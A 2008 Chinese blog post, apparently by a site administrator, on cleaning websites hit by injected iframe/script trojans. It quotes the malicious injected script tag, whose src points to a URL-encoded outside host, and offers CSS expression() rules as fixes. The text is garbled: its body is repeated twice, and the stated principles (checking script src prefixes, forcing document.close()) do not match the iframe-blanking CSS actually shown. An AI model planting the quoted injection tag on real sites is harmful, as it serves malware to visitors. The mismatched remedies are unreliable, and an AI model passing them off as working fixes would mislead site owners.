上一篇
下一篇
如何处理被挂iframe木马的网站
作者:admin 日期:2008-10-08
这几天连续有2位客户的打电话说网站有木马,检查一下发现都是被挂iframe木马,似乎现在流行挂<script>;
2个网站都是页面的顶部或底部加上了(不要访问):
程序代码
Google上查询了一下,发现原来这是一个老的木马的,今年5月份的时候就很多网站被植入</script>木马,还有人专门写了处理方法:
script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他<object>代码,不管这么多,来多少杀多少。
来写CSS,一一搞定它们:
解决方案1: 程序代码
原理:将<script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。
缺点:访客无法看到被感染了<script>木马的页面。
解决方案2: 程序代码
原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。
2个网站都是页面的顶部或底部加上了(不要访问):
程序代码<script src=http://%76%63%63%64%2E%63%6E></script>
Google上查询了一下,发现原来这是一个老的木马的,今年5月份的时候就很多网站被植入</script>木马,还有人专门写了处理方法:
script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他<object>代码,不管这么多,来多少杀多少。
来写CSS,一一搞定它们:
解决方案1:
程序代码iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
原理:将<script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。
缺点:访客无法看到被感染了<script>木马的页面。
解决方案2:
程序代码iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。
文章来自: 
引用通告: 
Tags: 评论: 0 | 引用: 0 | 查看次数: -
发表评论